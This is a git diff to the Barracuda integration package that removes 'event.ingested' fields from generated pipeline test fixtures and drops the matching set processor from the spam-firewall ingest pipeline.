"scan[nimveni]: idi[10.96.135.47] rum 1545434414 1545434414 accept eporroq ulla iqu oin 1 55 cingel modocon", "tags": [ "preserve_original_event" @@ -904,9 +679,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361830537Z" - }, "message": "reports: REPORTS (atv.exe) queued as onu", "tags": [ "preserve_original_event" @@ -916,9 +688,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361831513Z" - }, "message": "scan: obeataev[10.139.127.232] nsec 1547904323 1547904323 cancel maperi agnaaliq tlaboree norumet 7 48 tin SZ:fugitse SUBJ:imad", "tags": [ "preserve_original_event" @@ -928,9 +697,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361832483Z" - }, "message": "inbound/pass1: inv[10.163.209.70] atu 1549139277 1549139277 SCAN lloin remipsum tempor citatio 0 57 mveniamq SZ:taedict SUBJ:edquian", "tags": [ "preserve_original_event" 
@@ -940,9 +706,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361833441Z" - }, "message": "reports: REPORTS (mipsamvo.exe) queued as eiusmod", "tags": [ "preserve_original_event" @@ -952,9 +715,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361834383Z" - }, "message": "scan[avolu]: Except[10.191.7.121] umetMal 1551609186 1551609186 accept sciun metcons itasper uae 2 21 uia iciad", "tags": [ "preserve_original_event" @@ -964,9 +724,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361835393Z" - }, "message": "inbound/pass1: [10.157.196.101] gnaa 1552844140 1552844140 RECV mod doei cipitl", "tags": [ "preserve_original_event" @@ -976,9 +733,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361836382Z" - }, "message": "web: [10.171.72.5] global CHANGE eprehend (asnu)", "tags": [ "preserve_original_event" @@ -988,9 +742,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361837316Z" - }, "message": "scan: eritatis[10.209.184.60] mquisn 1555314049 1555314049 cancel uto emUte molestia quir 4 18 emip SZ:ver SUBJ:erc", "tags": [ "preserve_original_event" @@ -1000,9 +751,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361838269Z" - }, "message": "inbound/pass1[dolorsit]: archite[10.143.228.97] isqua 1556549003 1556549003 RECV uta emo itq", "tags": [ "preserve_original_event" @@ -1012,9 +760,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361839233Z" - }, "message": "reports: REPORTS (ntexpl.exe) queued as dunt", "tags": [ "preserve_original_event" @@ -1024,9 +769,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361840212Z" - }, "message": "scan: plic[10.17.87.79] tetur 1559018911 1559018911 block amali ate idolor ratvolu 7 64 onse olorem", "tags": [ "preserve_original_event" 
@@ -1036,9 +778,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361841159Z" - }, "message": "web: [10.163.18.29] FAILED_LOGIN (nim)", "tags": [ "preserve_original_event" @@ -1048,9 +787,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361842186Z" - }, "message": "web: Retention violating accounts: erspi total", "tags": [ "preserve_original_event" @@ -1060,9 +796,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361843187Z" - }, "message": "reports: REPORTS (billoi.exe) queued as moles", "tags": [ "preserve_original_event" @@ -1072,9 +805,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361844147Z" - }, "message": "scan: taedi[10.17.98.243] etconsec 1563958728 1563958728 cancel ill mporinc onsectet idolo 8 55 docon SZ:mdolore SUBJ:eosquira", "tags": [ "preserve_original_event" @@ -1084,9 +814,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361845079Z" - }, "message": "reports: REPORTS (apariatu.exe) queued as lorsita", "tags": [ "preserve_original_event" @@ -1096,9 +823,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361846118Z" - }, "message": "reports: REPORTS (ever.exe) queued as tali", "tags": [ "preserve_original_event" @@ -1108,9 +832,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361847068Z" - }, "message": "inbound/pass1[mipsumqu]: tatio[10.181.247.224] onnu 1567663591 1567663591 RECV olorema aquiof ende", "tags": [ "preserve_original_event" @@ -1120,9 +841,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361848014Z" - }, "message": "scan[ugitse]: quiineav[10.235.116.121] ventore 1568898545 1568898545 deny obea emp agnaaliq est 0 73 aev SZ:inrepr SUBJ:mol", "tags": [ "preserve_original_event" 
@@ -1132,9 +850,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361849083Z" - }, "message": "outbound/smtp: 10.178.30.158 llit tenimad sitametc allow onproide 2 cillumd riosa Ok: queued as tNe #to#10.1.6.115", "tags": [ "preserve_original_event" @@ -1144,9 +859,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361850035Z" - }, "message": "notify/smtp[rautod]: 10.124.32.120 lapar ritati accept qui 3 mullam 4965 1.4254 meaque uid", "tags": [ "preserve_original_event" @@ -1156,9 +868,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361851031Z" - }, "message": "reports: REPORTS (ataevita.exe) queued as oremqu", "tags": [ "preserve_original_event" @@ -1168,9 +877,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.362046275Z" - }, "message": "reports: REPORTS (velitsed.exe) queued as magnaali", "tags": [ "preserve_original_event" @@ -1180,9 +886,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.362049328Z" - }, "message": "inbound/pass1: der[10.77.182.191] enbyCi 1575073317 1575073317 SCAN quameiu diduntu eiusmod itation 8 79 piciatis2460.api.host iusmodt", "tags": [ "preserve_original_event" @@ -1192,9 +895,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.362050532Z" - }, "message": "scan: iame[10.193.110.71] tiumd 1576308271 1576308271 accept loinve tanimid isnostru nofdeFi 3 5 saqu remips", "tags": [ "preserve_original_event" diff --git a/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml b/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml index 1866136294a..383b8d85377 100644 --- a/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml +++ b/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml 
@@ -2,10 +2,6 @@ description: Pipeline for Barracuda Spam Firewall processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json index 9475ba22fe1..57b36556b23 100644 --- a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417884657Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" @@ -16,9 +13,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417887946Z" - }, "message": "BYPASS: Mode set to BYPASS (nbyCic).", "tags": [ "preserve_original_event" @@ -28,9 +22,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417889122Z" - }, "message": "UPDATE: [ALERT:tvolup] New attack definition version 1.1000 is available", "tags": [ "preserve_original_event" @@ -40,9 +31,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417890097Z" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "tags": [ "preserve_original_event" @@ -52,9 +40,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417891067Z" - }, "message": "STM_WRAPPER: Initializing STM.", "tags": [ "preserve_original_event" @@ -64,9 +49,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417891979Z" - }, "message": "eventmgr: Forwarding log messages to syslog host #imadm, address=10.16.222.151", "tags": [ "preserve_original_event" 
@@ -76,9 +58,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417892883Z" - }, "message": "PROCMON: [ALERT:eritqui] One of the RAID arrays is degrading.", "tags": [ "preserve_original_event" @@ -88,9 +67,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417893807Z" - }, "message": "BYPASS: Mode change: ccusant,epteurs", "tags": [ "preserve_original_event" @@ -100,9 +76,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417894740Z" - }, "message": "UPDATE: [ALERT:modoco] New attack definition version 1.3971 is available", "tags": [ "preserve_original_event" @@ -112,9 +85,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417895641Z" - }, "message": "STM: LB-doloreeu elillumq CreateServer =loremeum", "tags": [ "preserve_original_event" @@ -124,9 +94,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417896546Z" - }, "message": "STM: WebLog-radi ula itsed: SapCtx=rad,SapId=olupta, ididu", "tags": [ "preserve_original_event" @@ -136,9 +103,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417897693Z" - }, "message": "UPDATE: [ALERT:xcepte] New attack definition version 1.4012 is available", "tags": [ "preserve_original_event" @@ -148,9 +112,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417898673Z" - }, "message": "PROCMON: Monitoring links: lo4933", "tags": [ "preserve_original_event" @@ -160,9 +121,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417899677Z" - }, "message": "PROCMON: [ALERT:doconse] One of the RAID arrays is degrading.", "tags": [ "preserve_original_event" 
@@ -172,9 +130,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417900601Z" - }, "message": "CONFIG_AGENT: odite atn It is recommended to configure cookie_encryption_key_expiry atleast 7 days ahead of current time., sectet", "tags": [ "preserve_original_event" @@ -184,9 +139,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417901525Z" - }, "message": "STM: LB-tet voluptas ActiveServerOutOfBandMonitorAttr =inv", "tags": [ "preserve_original_event" @@ -196,9 +148,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417902606Z" - }, "message": "STM_WRAPPER: [ALERT:obeata] Configuration size is pexeaco which exceeds the ercitati safe limit. Please check your configuration.", "tags": [ "preserve_original_event" @@ -208,9 +157,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417903535Z" - }, "message": "BYPASS: Mode change: urEx,labo", "tags": [ "preserve_original_event" @@ -220,9 +166,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417904455Z" - }, "message": "eventmgr: Event manager startup succeeded.", "tags": [ "preserve_original_event" @@ -232,9 +175,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417905395Z" - }, "message": "STM: LB-Maloru lapariat SetServerdmin=oinBCSed", "tags": [ "preserve_original_event" @@ -244,9 +184,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417906312Z" - }, "message": "STM_WRAPPER: Successfully stopped STM.", "tags": [ "preserve_original_event" @@ -256,9 +193,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417907225Z" - }, "message": "CONFIG_AGENT: luptate Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" 
@@ -268,9 +202,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417908129Z" - }, "message": "STM: LB-isistena Malorum SetSapquelauda=enderit", "tags": [ "preserve_original_event" @@ -280,9 +211,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417909320Z" - }, "message": "eventmgr: Forwarding log messages to syslog host #equun, address=10.4.65.246", "tags": [ "preserve_original_event" @@ -292,9 +220,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417910284Z" - }, "message": "UPDATE: [ALERT:exer] New attack definition version 1.481 is available", "tags": [ "preserve_original_event" @@ -304,9 +229,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417911221Z" - }, "message": "eventmgr: Event manager startup succeeded.", "tags": [ "preserve_original_event" @@ -316,9 +238,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417912116Z" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "tags": [ "preserve_original_event" @@ -328,9 +247,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417913011Z" - }, "message": "CONFIG_AGENT: isnisiu aspernat Update succeeded", "tags": [ "preserve_original_event" @@ -340,9 +256,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417913918Z" - }, "message": "INSTALL: Loading the snapshot for mquel release.", "tags": [ "preserve_original_event" @@ -352,9 +265,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417914898Z" - }, "message": "INSTALL: Migrating configuration from ueporr to ptate", "tags": [ "preserve_original_event" 
@@ -364,9 +274,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417915807Z" - }, "message": "PROCMON: [ALERT:onsequ] enp0s7094: link is up", "tags": [ "preserve_original_event" @@ -376,9 +283,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417916724Z" - }, "message": "CONFIG_AGENT: iquip tDuisau It is recommended to configure cookie_encryption_key_expiry atleast 7 days ahead of current time., amali", "tags": [ "preserve_original_event" @@ -388,9 +292,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417917630Z" - }, "message": "eventmgr: Event manager startup succeeded.", "tags": [ "preserve_original_event" @@ -400,9 +301,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417918595Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" @@ -412,9 +310,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417919656Z" - }, "message": "STM: LB-mveniam rvelill EnableServer =iame", "tags": [ "preserve_original_event" @@ -424,9 +319,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417920572Z" - }, "message": "PROCMON: number of stm worker threads iseuf", "tags": [ "preserve_original_event" @@ -436,9 +328,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417921507Z" - }, "message": "STM: WebLog-ipiscin idolore turExce: SapCtx=modoc,SapId=mdolors, borios", "tags": [ "preserve_original_event" @@ -448,9 +337,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417922412Z" - }, "message": "STM_WRAPPER: Successfully stopped STM.", "tags": [ "preserve_original_event" 
@@ -460,9 +346,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417923313Z" - }, "message": "eventmgr: Forwarding log messages to syslog host #ccusa, address=10.58.33.30", "tags": [ "preserve_original_event" @@ -472,9 +355,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417924223Z" - }, "message": "PROCMON: [ALERT:uiadolo] eth321: link is up", "tags": [ "preserve_original_event" @@ -484,9 +364,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417925124Z" - }, "message": "CONFIG_AGENT: rsi ciduntut Update succeeded", "tags": [ "preserve_original_event" @@ -496,9 +373,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417926024Z" - }, "message": "CONFIG_AGENT: radipis RPC Name =isa, RPC Result: aal", "tags": [ "preserve_original_event" @@ -508,9 +382,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417926929Z" - }, "message": "INSTALL: Loading the snapshot for ris release.", "tags": [ "preserve_original_event" @@ -520,9 +391,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417927859Z" - }, "message": "CONFIG_AGENT: aliqui rcitat Update succeeded", "tags": [ "preserve_original_event" @@ -532,9 +400,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417928768Z" - }, "message": "CONFIG_AGENT: aeconse Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" @@ -544,9 +409,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417929668Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" @@ -556,9 +418,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417930593Z" - }, "message": "CONFIG_AGENT: iaecon ipexea Update succeeded", "tags": [ "preserve_original_event" 
@@ -568,9 +427,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417931502Z" - }, "message": "INSTALL: Migrating configuration from nulapa to cillu", "tags": [ "preserve_original_event" @@ -580,9 +436,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417932414Z" - }, "message": "PROCMON: [ALERT:ectetura] Firmware storage exceeds didun", "tags": [ "preserve_original_event" @@ -592,9 +445,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417933332Z" - }, "message": "CONFIG_AGENT: rcit nul Received put-tree command", "tags": [ "preserve_original_event" @@ -604,9 +454,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417934450Z" - }, "message": "UPDATE: [ALERT:aliquaU] New attack definition version 1.1278 is available", "tags": [ "preserve_original_event" @@ -616,9 +463,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417935408Z" - }, "message": "UPDATE: [ALERT:amei] New attack definition version 1.7778 is available", "tags": [ "preserve_original_event" @@ -628,9 +472,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417936325Z" - }, "message": "UPDATE: [ALERT:gelitse] New attack definition version 1.3018 is available", "tags": [ "preserve_original_event" @@ -640,9 +481,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417937315Z" - }, "message": "INSTALL: Migrating configuration from iceroin to qui", "tags": [ "preserve_original_event" @@ -652,9 +490,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417938223Z" - }, "message": "INSTALL: Migrating configuration from pariatu to issusc", "tags": [ "preserve_original_event" 
@@ -664,9 +499,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417939127Z" - }, "message": "STM: FAILOVE-roinBCSe oreet Stateful Failover Module initialized.", "tags": [ "preserve_original_event" @@ -676,9 +508,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417940042Z" - }, "message": "STM_WRAPPER: Committing UI configuration.", "tags": [ "preserve_original_event" @@ -688,9 +517,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417940940Z" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "tags": [ "preserve_original_event" @@ -700,9 +526,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417941858Z" - }, "message": "INSTALL: Migrating configuration from ernat to Ute", "tags": [ "preserve_original_event" @@ -712,9 +535,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417942773Z" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "tags": [ "preserve_original_event" @@ -724,9 +544,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417943672Z" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "tags": [ "preserve_original_event" @@ -736,9 +553,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417944596Z" - }, "message": "STM: RespPage-rinrepr rvelill CreateRP: Response Page mve created successfully", "tags": [ "preserve_original_event" @@ -748,9 +562,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417945487Z" - }, "message": "STM_WRAPPER: [ALERT:ineav] Configuration size is onp which exceeds the gnaaliqu safe limit. Please check your configuration.", "tags": [ "preserve_original_event" 
@@ -760,9 +571,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417946428Z" - }, "message": "BYPASS: Mode set to never bypass.", "tags": [ "preserve_original_event" @@ -772,9 +580,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417947361Z" - }, "message": "CONFIG_AGENT: quaea RPC Name =eetd, RPC Result: fdeFin", "tags": [ "preserve_original_event" @@ -784,9 +589,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417948270Z" - }, "message": "PROCMON: number of stm worker threads isrro", "tags": [ "preserve_original_event" @@ -796,9 +598,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417949183Z" - }, "message": "CONFIG_AGENT: tutlabo Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" @@ -808,9 +607,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417950084Z" - }, "message": "INSTALL: Loading the snapshot for pli release.", "tags": [ "preserve_original_event" @@ -820,9 +616,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417950998Z" - }, "message": "CONFIG_AGENT: erit Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" @@ -832,9 +625,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417951917Z" - }, "message": "INSTALL: Loading the snapshot for mod release.", "tags": [ "preserve_original_event" @@ -844,9 +634,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417952819Z" - }, "message": "INSTALL: Loading the snapshot for lamcolab release.", "tags": [ "preserve_original_event" @@ -856,9 +643,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417953730Z" - }, "message": "INSTALL: Migrating configuration from estlab to tis", "tags": [ "preserve_original_event" 
@@ -868,9 +652,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417954629Z" - }, "message": "PROCMON: [ALERT:uamqua] Firmware storage exceeds labo", "tags": [ "preserve_original_event" @@ -880,9 +661,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417955534Z" - }, "message": "INSTALL: Migrating configuration from tfugit to taspern", "tags": [ "preserve_original_event" @@ -892,9 +670,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417956683Z" - }, "message": "eventmgr: Forwarding log messages to syslog host #meiusm, address=10.48.248.158", "tags": [ "preserve_original_event" @@ -904,9 +679,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417957611Z" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "tags": [ "preserve_original_event" @@ -916,9 +688,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417958612Z" - }, "message": "PROCMON: number of stm worker threads isonula", "tags": [ "preserve_original_event" @@ -928,9 +697,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417959543Z" - }, "message": "STM: FTPSVC-nimi ilmoles Ftp proxy initialized labor", "tags": [ "preserve_original_event" @@ -940,9 +706,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417960449Z" - }, "message": "PROCMON: [ALERT:atev] One of the RAID arrays is degrading.", "tags": [ "preserve_original_event" @@ -952,9 +715,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417961358Z" - }, "message": "CONFIG_AGENT: amaliq ept Received put-tree command", "tags": [ "preserve_original_event" @@ -964,9 +724,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417962267Z" - }, "message": "BYPASS: Mode set to BYPASS (ectetura).", "tags": [ "preserve_original_event" 
@@ -976,9 +733,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417963173Z" - }, "message": "STM: COOKIE-icab quiado scipit = quiavolu", "tags": [ "preserve_original_event" @@ -988,9 +742,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417964108Z" - }, "message": "BYPASS: Mode set to never bypass.", "tags": [ "preserve_original_event" @@ -1000,9 +751,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418011880Z" - }, "message": "STM: CACHE-oconseq tsedd untin SapCtx susc, SapId amr, Return Code success", "tags": [ "preserve_original_event" @@ -1012,9 +760,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418014582Z" - }, "message": "STM: aps-ddoeius tautfugi ParamProtectionClonePatterns: Old:cin, New:fugia, PatternsNode:olors", "tags": [ "preserve_original_event" @@ -1024,9 +769,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418015832Z" - }, "message": "INSTALL: Loading the snapshot for admi release.", "tags": [ "preserve_original_event" @@ -1036,9 +778,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418016924Z" - }, "message": "CONFIG_AGENT: aecons Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" @@ -1048,9 +787,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418017868Z" - }, "message": "PROCMON: Monitoring links: eth801", "tags": [ "preserve_original_event" @@ -1060,9 +796,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418018819Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" @@ -1072,9 +805,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418019742Z" - }, "message": "UPDATE: [ALERT:ntoc] New attack definition version 1.7781 is available", "tags": [ "preserve_original_event" 
@@ -1084,9 +814,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418020760Z" - }, "message": "INSTALL: Loading the snapshot for stru release.", "tags": [ "preserve_original_event" @@ -1096,9 +823,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418021692Z" - }, "message": "PROCMON: Monitoring links: enp0s6182", "tags": [ "preserve_original_event" @@ -1108,9 +832,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418022643Z" - }, "message": "PROCMON: number of stm worker threads isumwri", "tags": [ "preserve_original_event" @@ -1120,9 +841,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418023569Z" - }, "message": "BYPASS: Mode set to never bypass.", "tags": [ "preserve_original_event" @@ -1132,9 +850,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418024577Z" - }, "message": "BYPASS: Mode set to BYPASS (eniamqu).", "tags": [ "preserve_original_event" @@ -1144,9 +859,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418025514Z" - }, "message": "UPDATE: [ALERT:tco] New attack definition version 1.6840 is available", "tags": [ "preserve_original_event" @@ -1156,9 +868,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418026469Z" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "tags": [ "preserve_original_event" @@ -1168,9 +877,6 @@ "ecs": { 